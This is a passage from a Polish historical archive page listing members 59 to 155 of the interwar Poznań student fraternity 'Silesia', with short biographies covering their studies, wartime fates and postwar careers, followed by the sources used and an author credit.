 59. Piotr Krusze, c. ok. 1931, skarbnik sem. zim. 1933/34, wiceprezes sem. zim. 1934/35, mgr prawa

 60. Józef Krzywoń,
 61. Karol Kubicki, ( - przed 1980) po wojnie prawd. w Poznaniu

  Stefan Kudera, 1936/37 r.

 62. Stefan Kudera, (8 września 1916 w Żninie w Wielkopolsce - 19 lipca 1944 w Dachau) s. Brunona (Silesia), z Mysłowic, harcerz Chorągwi Śląskiej, absolwent gimnazjum w Mysłowicach, student farmacji UP 1936-39, c. 1936/37, w czasie okupacji w konspiracji w ZWZ-AK, uczestnik Akcji “N”, wyjechał do Insbrucka, gdzie kontynuował i ukończył studia farmacji 1941-43, miał uczestniczyć w ruchu oporu w Tyrolu, w 1944 aresztowany i osadzony w obozie koncentracyjnym w Dachau, gdzie został wraz z bratem zamordowany

 63. Feliks Kurcz, mgr praw, adwokat, po wojnie przez zieloną granicę uciekł na Zachód

  E. Kusz, 1936/37 r.

 64. E. Kusz, c. 1936/37

 65. Alfons Kuszka,

  Ludwik Kuś, 1936/37 r.

 66. Ludwik Kuś, c. 1936/37, mgr praw

  Alfred Lewandowski, 1932 r.

 67. Alfred Lewandowski, (2 grudnia 1913 w Katowicach - ) student i absolwent 1935 farmacji UP, c. ok. 1931, członek Koła Farmaceutów 1933

  Henryk Liersz, ok. 1930 r. (?).

 68. Henryk Liersz, (11 grudnia 1908 w Poznaniu - 27 lutego 1980 w Chorzowie) sekretarz 1930/31

 69. Józef Lipina, ( - 1939-45) kuzyn Pawła (Silesia), rodem z Opolszczyzny, ścięty w Berlinie
 70. Paweł Lipina, kuzyn Józef (Silesia), inż. rolnik, leśnik

  Józef Lissowski, pierwsza poł. lat 30-tych.

 71. Józef Lissowski, (1912 w Michałkowicach [obecnie dzielnica Siemianowic Śląskich] - 1942) s. Stanisława i Heleny z d. Niedźwiedzińska, student i absolwent farmacji UP (mgr farmacji), c. ok. 1931, po studiach pracował jako farmaceuta, uczestnik wojny obronnej 1939, aresztowany przez Gestapo, więziony w obozie koncentaracyjnym Auschwitz (nr 20519), gdzie zmarł

 72. Ludwik Lubecki, skreślony 1931/32
 73. Zygmunt Lubecki, członek Zarządu Koła Poznańskiego MW
 74. Edmund Lubos , (13 października 1905 w Piekarach - 16 marca 1972 w Chorzowie) z Tarnowskich Gór, s. Wilhelma (górnika) i Agnieszki z d. Świder, uczeń Gimnazjum Klasycznego w Chorzowie, uczestniczył w akcji plebiscytowej oraz trzecim powstaniu śląskim, matura 1927, student i magister prawa UP 1927(?)-1934, pracował w Urzędzie Skarbowym w Katowicach 1928-29, po studiach aplikował w sądach grodzkim, okręgowym i apelacyjnym w Katowicach, a następnie od 1937 u adwokatów Henryka Blachnika, a do wybuchu wojny u Alfonsa Piechy w Chorzowie, aresztowany za udział w powstaniu śląskim i osadzony w obozie w Dachau 1940-42, po powrocie z obozu pracował jako robotnik, a następnie do wkroczenia armii radzieckiej jako pracownik umysłowy w Przedsiębiorstwie Budowlanym Karola Przybyły w Katowicach, następnie organizator i kierownik Urzędu Pracy w Chorzowie, w 1946 wpisany na listę adwokatów Izby Adwokackiej w Katowicach, kierownik Wydziału Pracy i Pomocy Społecznej w Prezydium Miejskiej Rady Narodowej w Chorzowie 1950-53, od 1953 inspektor w Rejonowej Zbiornicy Złomu w Katowicach, a następnie kierownik działu planowania i organizacji w Zakładzie Przerobu Złomu Metali Nieżelaznych w Nowym Bytomiu, a od 1956 kierownik sekcji rozliczeń Zakładu, mianowany na stopień ppor 1971, pochowany na cmentarzu parafialnym parafii Św. Jadwigi w Chorzowie [Źródła (poza wskazanymi poniżej spisu członków): dokumenty osobiste oraz relacja stryjecznego wnuka Jarosława Lubosa]

  Witalis Ludwiczak, 1929/30 r.

 75. Witalis Ludwiczak, (20 kwietnia 1910 w Poznaniu - 17 czerwca 1988 w Poznaniu) bratanek Antoniego (Masovia), sekretarz r.a. 1931/32 (Prezydium X-lecia), hokeista, zawodnik klubów AZS Poznań, Pogoni Katowice i Lechii Poznań, mistrz Polski z 1934, w reprezentacji rozegrał 47 spotkań strzelając 3 bramki, olimpijczyk (Lake Placid 1932, Garmisch-Partenkirchen 1936), wioślarz, mistrz Polski w czwórkach bez sternika w 1933, działacz sportowy i wieloletni prezes AZS, odznaczony medalem Kalos Kagathos, prawnik, cywilista, prof. zw. UAM 1969, prorektor UAM, autor ponad 60 prac naukowych

 76. Herman Lukassok (Lukassek), c. ok. 1931
 77. Józef (Henryk) Łukaszek, dr med., rentgenolog, po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago

  Erwin Makowski, 1929 r.

 78. Erwin Franciszek Makowski, (26 maja 1907 w Bytomiu - 31 stycznia 1984 w Bytomiu) s. Franciszka i Józefy z d. Zacharek, absolwent Gimnazjum w Mysłowicach 1926, student i absolwent prawa UP 1926-33, prezes sem. zim. 1932/33, po studiach naczelnik Wydziału Opieki Społecznej w Magistracie w Katowicach, w czasie okupacji w konspiracji, prowadził firmę handlową i fabrykę konstrukcji żelaznych “K. Borkowski i Ska”, w 1945 dyrketor Państwowego Urzędu Repatriacyjnego, później m.in. prowadził przedsiębiorstwo handlowe z branży żelaznej 1945-48, pracownik Przedsiębiorstwa Budownictwa Przemysłowego w Katowicach 1949-50, od 1955 prowadził Biuro Podań do Władz Administracyjnych i Sądowych, a od 1956 pracował także jako tłumacz przysięgły, odznaczony Złotym Krzyżem Zasługi z Mieczami

 79. Gerard Maksyś, ( - połowa lat 70-tych) skarbnik sem. let. 1935/36, mgr praw
 80. Stefan Małecki,
 81. Jan Matejczyk, (21 lipca 1904 w Bytomiu - 1940 w Katyniu) s. Jana i Anny z Bregułów, student i absolwent 1928 prawa UP, sędzia grodzki, absolwent Szkoły Podchorążych Rezerwy Piechoty w Śremie 1929, ppor. rez., przydzielony do 3 Pułku Strzelców Podhalańskich, w niewoli sowieckiej, zamordowany przez NKWD

  Adam Meyza, 1932 r.

 82. Adam Meyza, c. ok. 1931, sekretarz sem. let. 1935/36, mgr praw

  Dionizy Mędlewski

 83. Dionizy Mędlewski, (1908-2002) s. Dionizego (Vratislavia) i brat Wiktora (Silesia), c. ok. 1931

  Wiktor Mędlewski, 1932 r.

 84. Wiktor Mędlewski, (1907-1992) s. Dionizego (Vratislavia) i brat Dionizego (Silesia), prezes r.a. 1931/32 (Prezydium X-lecia), wiceprezes PKM 1932/33, działacz Młodzieży Wszechpolskiej i Związku Młodych Narodowców, mgr praw, sędzia

  Jan Kazimierz Michalski, lata 30-te.

 85. Jan Kazimierz Michalski, (11 października 1912 w Pszczynie - 21 marca 1965 w Toronto) s. Hipolita (urzędnika, powstańca śląskiego) i Marty z d. Kłoska, absolwent Gimnazjum w Pszczynie, student prawa UP 1931-36, c. ok. 1931, sekretarz sem. zim. 1933/34, prawnik, aplikant adwokacki w Katowicach, absolwent podchorążówki w III Pułku Strzelców Podhalańskich w Bielsku-Białej, walczył w wojnie obronnej 1939, przez Węgry dostał się do Francji, w kampanii norweskiej ppor. Brygady Strzelców Podhalańskich, asystent na Polskim Wydziale Prawa w Oxfordzie, gdzie obronił doktorat, w 1949 wyjechał do Kanady, prowadził biuro tłumaczeń i księgarnię w Toronto, działacz polonijny, sekretarz Kongresu Polonii Kanadyjskiej, ożenił się z Heleną Pietraszek 1950, mieli syna Konstantego (?), zmarł na zawał serca [Źródła (poza wskazanymi poniżej spisu członków): relacja Anny Marii Bacquet na podstawie informacji rodzinnych]

  Jerzy Mularczyk, 1936/37 r.

 86. Jerzy Mularczyk, c. 1936/37, po wojnie na emigracji w Kanadzie i Katowicach

 87. Jerzy Musioł, (1914? - styczeń 1984) s. Wiktora, student prawa UP, w czasie okupacji od 1941 w Warszawie, po wojnie w Warszawie, a następnie w Tarnowskich Górach, dyrektor Zakładów Mięsnych w Tarnowskich Górach
 88. Adam Niebieszczański, wiceprezes r.a. 1931/32 (Prezydium X-lecia), sekretarz ZG Obozu Wszechpolskiego na Śląsku, członek Sądu Koleżeńskiego Studentów Bratniej Pomocy 1931/32, mgr praw, poeta, publicysta, w PSZ na Zachodzie, po wojnie na emigracji w Stanach Zjednoczonych
 89. Józef Nikiel, c. ok. 1931, dr med., internista
 90. Adolf Nowarra,

  Bogdan Orlicki, 1932 r.

 91. Bogdan Orlicki, (9 stycznia 1905 w Pyskowicach pow. Gliwice - 9 lipca 1983 w Gnieźnie) s. Feliksa i (kupca, założyciela i dyrektora Banku Ludowego w Gliwicach, burmistrza Lublińca) i Stefanii z Maciejewskich, brat Lecha (Silesia), absolwent Gimnazjum w Gliwicach, tłumacz j.francuskiego i goniec Polskiego Komitetu Plebiscytowego w Gliwicach, którego agendy mieściły się częściowo w mieszkaniu jego ojca, komisarza plebiscytowego na powiat i miasto Gliwice, podczas Trzeciego Powstania łącznik pomiędzy Gliwicami a oddziałami powstańczymi blokującymi miasto, student i absolwent 1945 med. UP, psychiatra, od 1945 pracował w Państwowym Szpitalu dla Nerwowo i Psychicznie Chorych “Dziekanka” w Gnieźnie, dyrektor Państwowego Szpitala dla Nerwowo i Psychicznie Chorych w Branicach woj. opolskie 1954-56, potem ordynator w Dziekance, pochowany na Cmentarzu Piotra i Pawła w Gnieźnie [Źródła (poza wskazanymi poniżej spisu członków): relacja syna Piotra Orlickiego]

 92. Lech Orlicki, ( - 1987?) mgr praw, po wojnie na emigracji w Wielkiej Brytanii
 93. Leon Paczkowski, absolwent AH, mgr ekonomii
 94. Parchatka, założyciel Silesii

  Brunon Pawlak, ok. 1930 r.

 95. Brunon Pawlak, brat Stanisława (Silesia), chemik

  Stanisław Pawlak, ok. 1930 r.

 96. Stanisław Pawlak, (13 listopada 1908 - 7 maja 2001) brat Brunona (Silesia), absolwent leśnictwa UP 1932

 97. Eugeniusz Peikert, c. ok. 1931
 98. Józef Euzebiusz Peteja, (14 sierpnia 1912 w Katowicach - 4 maja 1981 w Bytomiu) s. górnika Jerzego i Franciszki z d. Włóczyk, matura 1932, student med. UP, c. ok. 1931, sekretarz sem. zim. i sem. let. 1936/37, prezes sem. zim. 1937/38, uczetnik wojny obronnej 1939, internowany w Rumunii, po ucieczce wszedł w skład Brygady Strzelców Karpackich, walczył pod Tobrukiem, później w II Korpusie PSZ, oddelegowany na studia med., które ukończył w Bejrucie 1944, po wojnie pozostał w Wielkiej Brytanii, w 1947 wrócił do Polski, pediatra, pracował w Brzozowicach Kamieniu, później pracował, a także był dyrektorem w Szpitalu Dziecięcym im. Boya Żeleńskiego w Bytomiu, od 1971 lekarz naczelny ds. pediatrii w Szpitalu nr 2 przy ul. Batorego w Bytomiu, odznaczony m.in. Gwiazdą za wojnę 1939-45, Gwiazdą Afryki, Gwiazdą Italii, Gwiazdą za Tobruk, Krzyżem Kawalerskim OOP, pochowany na cmentarzu przy ul. Powstańców Śląskich w Bytomiu
 99. Alojzy Piechaczek, brat Pawła (Silesia), założyciel Silesii, dr med., dermatolog

  Walenty Pientka, lata 20.

 100. Walenty Pientka, (14 lutego 1901 w Żerdzinach k. Raciborza - 23 marca 1971 w Rydułtowach) s. Jana i Pauliny z d. Perenc, absolwent Gimnazjum w Raciborzu, walczył w szeregach POW na Śląsku 1920, student i absolwent 1925 prawa UP, aplikację sądową odbył w okręgu Sądu Apelacyjnego w Katowicach, asesor sądowy i sędzia 1929-31, a następnie adwokat w Rybniku, w czasie okupacji w konspiracji ZWZ, 22 lutego 1942 aresztowany przez gestapo na ul. Grodzkiej i więziony przez dziewięć miesięcy na Montelupich w Krakowie, w marcu 1943 osadzony w obozie koncentracyjnym w Oświęcimiu, skąd 10 kwietnia przewieziony do Mathausen-Gusen, członek obozowego ruchu oporu, uwolniony w maju 1945, od listopada 1945 adwokat w Katowicach, a następnie w Bytomiu, od 1948 w Raciborzu, członek Okręgowej Rady Adwokackiej 1954-57, członek Komisji Rewizyjnej Naczelnej Rady Adwokackiej 1957-61, bezpartyjny, odznaczony m.in. “Śląską Wstęga Waleczności i Zasługi”, “Medalem Rodła” (wg relacji rodzinnej, rodzina nie przyjęła tego odznaczenia od komunistycznej władzy), “Odznaką 1000-lecia”, “Medalem 10-lecia Polski Ludowej”, pochowany w rodzinnym grobowcu w Raciborzu [Źródła (poza wskazanymi poniżej spisu członków): J. Polewka, Początki i rozwój adwokatury polskiej na Górnym Śląsku, Katowice 2005; M. Jagielski, Historia adwokatury polskiej na Śląsku Opolskim 1945-2013, Opole 2013, s. 178; relacja Krystyny Szkutnik]

 101. Plewnia, założyciel Silesii

  Jerzy Poremba, 1936/37 r.

 102. Jerzy Poremba (Poręba), c. 1936/37, sekretarz Związku Akademików Ślązaków 1938/39, lekarz, po wojnie na emigracji w Szwajcarii

 103. Wincenty Prus,
 104. Wiktor Przybyła, dr
 105. Józef Pupek, mgr matematyki

  Herbert Puszer, prawd. ok. 1930 r.

 106. Herbert Puszer, (9 kwietnia 1908 w Rybniku - marzec 1942) s. Maksymiliana (starszego przodownika policji śledczej w Katowicach), magister, prof. Gimnazjum Polskiego w Bielsku, “ofiara hitleryzmu”

 107. Joachim Ranoszek, ( - zm. w RPA) brat Karola (Rosevia), mgr farmacji, po wojnie na emigracji w Republice Południowej Afryki

  Józef Roguszczak, koniec lat 20-tych.

 108. Józef Roguszczak, (14 marca 1910 w Essen - 1940 w Katyniu) s. Franciszka i Marianny z Borowiaków, absolwent Gimnazjum Matematyczno-Przyrodniczego w Katowicach 1928, student i absolwent 1933 Wydziału Prawno-Ekonomicznego UP, olderman r.a. 1931/32 (Prezydium X-lecia), dr nauk ekonomicznych UP 1937, paracował i mieszkał w Katowicach, ppor. rez., przydzielony do 73 Pułu Piechoty, w niewoli sowieckiej, zamordowany przez NKWD

 109. Rudowski, inż.
 110. Zbigniew Rudzki, założyciel Silesii, pierwszy sekretarz sem. let. 1921/22, Filister meritus Silesii, zginął w obozie w czasie wojny, Dachau?
 111. Paweł Rusecki, mgr ekonomii, po wojnie na emigracji we Francji
 112. Wiktor Rydlewski,

  Alfons Ryguła, 1936/37 r.

 113. Alfons Ryguła, c. 1936/37, sekretarz sem. let. 1938/39, dr med., chirurg, po wojnie w Niemczech

  Bernard Rymer, 1937 r.

 114. Bernard Rymer, (29 sierpnia 1914 w Katowicach - ) s. Józefa i Teresy z d. Kozubek, absolwent Państwowego Gimnazjum Męskiego w Gimnazjum, student i absolwent WSH/AH, sekretarz sem. zim. 1936/37 oraz sem. zim. 1937/38, zmobilizowany w 1939, przez Rumunię i Francję dostał się do Wielkiej Brytanii, służył w Samodzielnej Brygadzie Spadochronowej gen. Sosabowskiego, po wojnie przeszedł w stan spoczynku w stopniu kapitana, student Uniwersytetu w Edynburgu, pozostał na emigracji w Wielkiej Brytanii, pracował jako lakiernik

  Czesław Rymer, 1937 r.

 115. Czesław Rymer, (21 listopada 1916 w Katowicach - ) s. Józefa i Teresy z d. Kozubek, absolwent Państwowego Gimnazjum Męskiego w Katowicach, student prawa UP, c. 1936, w czasie okupacji pracował w Zarządzie Majątków Ziemskich w Krakowie oraz w Fabryce Wyrobów Drzewnych “Unitas” w Krakowie, po wojnie ukończył prawo UJ 1959 (mgr prawa), pracował w Centrali Dostaw Drzewnych Przemysłu Węglowego w Katowicach, Wojewódzkim Biurze Projektów w Katowicach, Budowlano-Montażowej Spółdzielni Pracy w Katowicach oraz w Biurze Projektów Kopalnictwa Surowców Chemicznych Biprokop w Katowicach

  Stefan Rymer, 1932 r.

 116. Stefan Rymer, (28 grudnia 1910 w Bochum - 20 marca 1995 w Katowicach) s. Józefa i Teresy z d. Kozubek, absolwent Państwowego Gimnazjum Meskiego w Katowicach, student i absolwent prawa UP, c. 1930, wiceprezes sem. zim. 1933/34, w czasie okupacji w Podziemnej Organizacji na Śląsku oraz “Szańca” w Krakowie (w ramach AK), po wojnie więziony przez UB, pracował jako radca prawny, pochowany na cmentarzu przy ul. Francuskiej w Katowicach

  Paweł Rzymełka, 1926 r.

 117. Paweł Rzymełka, ( - 1984) asystent na UP, mgr praw, radca prawny

  Jan Sajdak, ok. 1932 r.

 118. Jan Sajdak (junior), (18 lutego 1909 w Tarnowie -14 czerwca 1991 w Poznaniu) s. Jana (rektora UP, Silesia) i Stefanii z d. Pazdro, brat Stefana (Silesia), absolwent Gimnazjum im. K. Marcinkowskiego w Poznaniu 1927, student i absolwent prawa UP 1927-31, olderman 1930/31, kurator Demetrii, prezes Koła Prawników i Ekonomistów 1929/30, przewodniczący Komisji Rewizyjnej Koła Prawników i Ekonomistów 1930/31, prokurator Bratniej Pomocy Studentów UP 1930/31, sekretarz Poznańskiego Komitetu Akademickiego 1930/31, po studiach odbywał aplikację sądową, a od 1933 aplikację adwokacką, w 1939 zdał egazmin adwokacki, wykładowca prawoznawstwa w Liceum Handlowym Izby Przemysłowo-Handlowej w Poznaniu 1933-39, w czasie okupacji wysiedlony z Poznania do Warszawy, gdzie do powstania warszawskiego prowadził kancelarię adwokacką, w powstaniu warszawskim walczył w odziale rotmistrza Witwickiego ps. “Wicher”, po powstaniu ukrywał się na wsi w pow. Skierniewice i Tarnów, kierownik Sądu Grodzkiego w Lesznie 1945-47, wykładowac Wyższej Szkoły Gospodarstwa Wiejskiego w Łodzi 1946-48, dr praw 1948, od 1949 asystent-wolonatriusz w katedrze prawa cywilnego UP, adwokat, po wojnie poseł Krajowej Rady Narodowej 1945, a następnie do 1953 radny Wojewódzkiej Rady Narodowej z ramienia ZSL, zajmował się numizmatyką i filiatelistyką, odznaczony m.in. francuskim Orderem Palm Akademickich, Krzyżem Kawalerskim OOP, Medalem Zasłużony dla Adwokatury, działacz Zrzeszenia Prawników Polskich, pochowany na cmentarzu na Junikowie w Poznaniu

  Stefan Sajdak, lata 30-te.

 119. Stefan Sajdak, (27 kwietnia 1913 w Krakowie - 16 października 1964 w Londynie) s. Jana (rektora UP, Silesia) i Stefanii z d. Pazdro, brat Jana (juniora, Silesia), absolwent Gimnazjum im. K. Marcinkowskiego w Poznaniu, student i absolwent prawa UP 1932-36, c. 1931/32, wiceprezes sem. let. 1935/36, przewodniczący Komisji Rewizyjnej Koła Prawników i Ekonomistów 1935/36, po studiach pracował przez rok w Katowicach w firmie górniczej Skarloofem (?), w wojnie obronnej 1939 w 3 Pułku Ułanów, w niewoli niemieckiej w Bawarii 1939-45, po wojnie na emigracji w Wielkiej Brytanii, prowadził eksport lekarstw do Polski z apteki Towarzystwa Pomocy Polakom, sekeratarz Koła Pułkowego w Londynie, pochowany w Londynie

 120. Antoni Sarnowski, brat Ludwika (Vratislavia), prezes sem. let. 1935/36, olderman sem. zim. 1936/37 oraz 1938, inż. rolnik
 121. Antoni Schlenczek, c. ok. 1931, skreślony 1931/32
 122. Wincenty Sikora, członek Zarządu Koła Farmaceutów 1935/36, mgr farmacji

  Władysław Sikora, 1932 r.

 123. Władysław Sikora, c. 1931/32, mgr ekonomii

 124. Jan Skibka,
 125. Robert Skop, założyciel Silesii, prawnik, adwokat
 126. Eryk Skowron, mgr praw
 127. Heribert Skubatz, c. 1931/32

  Wincenty Skutella, 13 XII 1923 r.

 128. Wincenty Skutella, po wojnie na emigracji

 129. Stefan Słanina, c. ok. 1931, skarbnik r.a. 1931/32 (Prezydium X-lecia), przewodniczący Komisji Rewizyjnej Bratniej Pomocy Studentów UP 1934/35, dwukrotny przezes Bratniej Pomocy Studentów UP 1935-37
 130. Michał Sobczyk, (1912-1987) brat Jana (Slensania), mgr praw

  Edward Sojka, 1928/29 r. (?).

 131. Edward Sojka, powstaniec śląski, prezes 1928/29, wiceprezes PKM 1928/29, wiceprezes Obozu Wszechpolskiego na Śląsku, wiceprezes Poznańskiego Komitetu Akademickiego 1929/30, mgr praw, adwokat, sekretarz Koła Seniorów Silesii 1932, w czasie wojny w rządzie londyńskim, po wojnie na emigracji w Wielkiej Brytanii

  Józef Soppa, 1936/37 r.

 132. Józef Soppa, ( - przed 1980) c. 1936/37, mgr praw, po wojnie prawd. w Poznaniu

 133. Ludwik Spyra, c. ok. 1931, mgr leśnik
 134. Wiesław Kazimierz Stanula, (23 lutego 1914 w Stanisławowie - ) student i absolwent 1950 med. UP, wiceprezes 1937/38 oraz prezes 1938/39 Koła Medyków 1937/38, chirurg, w 1956 dyrektor Szpitala Powszechnego w Strzelcach Opolskich
 135. Józef Swoboda, c. ok. 1931, lekarz, po wojnie w Niemczech
 136. Leopold Szefer,
 137. Stanisław Szkudlarz,
 138. Józef Śmieja, (1900 - ) założyciel Silesii, pierwszy wiceprezes sem. let. 1921/22, prezes 1923/24, Filister meritus Silesii, lekarz, chirurg, ordynator szpitala
 139. Paweł Świtała, mgr praw
 140. Henryk Tatarczyk, (31 maja 1912 w Małej Dąbrówce w pow. katowickim - 1940 w Katyniu) s. Teodora i Marii z Bazów, absolwent Państwowego Gimnazjum Klasycznego im. Odrowążów w Królewskiej Hucie 1932, student i absolwent 1937 prawa UP, c. 1931/32, absolwent Szkoły Podchorążych Rezerwy Artylerii we Włodzimierzu Wołyńskim 1936, ppor. rez., przydzielony do 21 Pułku Artylerii Lekkiej, w niewoli sowieckiej, zamordowany przez NKWD

  Teodor Tkocz, lata 30-te.

 141. Teodor Tkocz, (1914-1999) wiceprezes Związku Akademików Ślązaków 1938/39, działacz harcerstwa polskiego, mgr wychowania fizycznego, organizator ruchu oporu na Śląsku, później partyzant w wojskach Tity (?)

 142. Jan Tokarski, c. 1931/32
 143. Józef Tokarski, ( - 1935) prezes (?)

  Eryk Tunkel (?), Poznań 1934 r.

 144. Eryk Tunkel, c. 1931/32

 145. Artur Wencel, (1907-1998) absolwent UP, mgr praw

  Dezydery Werner, 1934/35 r.Alojzy Werner

 146. Alojzy Dezydery (Guenter) Werner, (13 lutego 1913 w Bytomiu - 23 września 1989) brat Erwina (Silesia), student i absolwent prawa UP, c. 1932, sekretarz sem. zim. 1934/35

 147. Erwin Werner, ( - zm. w Niemczech) brat Alojzego (Silesia), skarbnik sem. let. 1938/39, dr med., internista
 148. Franciszek Wesołek,
 149. Herbert Węgrzyk, c. ok. 1931

  Eryk Winkler

 150. Eryk Winkler, (3 grudnia 1912 - maj 1945 w Katowicach) s. Emila i Józefy, absolwent Gimnazjum w Rybniku 1931, student i absolwent medycyny UP 1931-39, c. 1931, prezes sem. zim. 1933/34 oraz 1936, prezes Akademickiego Koła Rybniczan, internista, po studiach na praktyce w szpitalach w Rydułtowach i Katowicach, w wojnie obronnej 1939 w służbie sanitarnej, internowany przez Sowietów, wrócił na Śląsk, działacz konspiracji w ZWZ-AK, gdzie organizował służbę sanitarną, dwukrotnie więzień obozów koncentracyjnych najpierw Dachau i Mauthausen-Gusen, a następnie Oświęcimia, zwalniany i zatrudniany jako lekarz, po wyzwoleniu odbudowywał PCK i organizował drużyny ratownicze w Nowej Wsi i okolicach, współtworzył Polski Związek Zachodni, działał w lokalnym Komitecie Pomocy Uchodźcom oraz w zarządzie komitetu Koła Niesienia Pomocy Rodzinom Żołnierzy, radny gminy Nowa Wieś-Wirek, aresztowany w maju 1945 przez UB, w nieznanych okolicznościach zamordowany w katowickim więzieniu (vide przedwojenny Rybnik)

  Jerzy Winkler

 151. Jerzy Winkler, (27 marca 1912 w Timmendorf pod Rybnikiem - 19 września 1960 w Rybniku) s. Jana, absolwent Gimnazjum w Pszczynie, student i absolwent med. UP 1931-45, c. 1931, oficer rez., uczestnik wojny obronnej 1939, internowany na Węgrzech, wrócił w 1940, organizator służby zdrowia w Rybniku, chirurg, ordynator oddziału chirurgii oraz od 1952 dyrektor szpitala w Rybniku

 152. Antoni Wocka,

  Edmund Wojcieszak

 153. Edmund Teodor Florian Wojcieszak, (1 lipca 1908 w Krotoszynie - 8 marca 1959 w Zabrzu) s. Stanisława i Agnieszki z d. Nowoziemska, absolwent Gimnazjum w Ostrzeszowie 1926, student i absolwent farmacji UP 1927-31, po studiach asystent UP oraz pracownik apteki sapieżańskiej w Poznaniu, później pracownik apteki św. Jana, w czasie wojny pracownik apteki miejskiej w Rybniku, zaangażowany w dostarczanie leków na potrzeby konspiracji, m.in. obozów koncentracyjnych, po wojnie współdzierżawca Apteki pod Orłami w Zabrzu, a następnie po jej upaństwowieniu jej kierownik, pracował także w Pogotowiu Ratunkowym w Zabrzu i jako inspektor Wydziału Zdrowia Urzędu Miasta Zabrze, pochowany na Cmentarzu w Krotoszynie

 154. Leopold Wyleżoł, (1902-1984) prezes 1926/27, mgr praw, adwokat
 155. Karol Wystrychowski, mgr praw, sędzia wojskowy, adwokat

Pieczęć Silesii, 1931 r.

Listę członków opracowano na podstawie:

1) Czesław Rymer (uzupełnienie Daniel Pater), Lista członków Polskiej Korporacji Akademickiej Silesia (Poznań), (w:) Polskie Korporacje Akademickie 1997, nr 14, s. 82 i n.,
2) materiałów archiwalnych z Archiwum UAM,
3) materiałów archiwalnych z Archiwum Korporacyjnego,
4) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Silesia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 VII 2008 r.
Ostatnia zmiana: 12 III 2022 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja “Silesia” (Poznań), (na:) www.archiwumkorporacyjne.pl, stan 12 III 2022 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }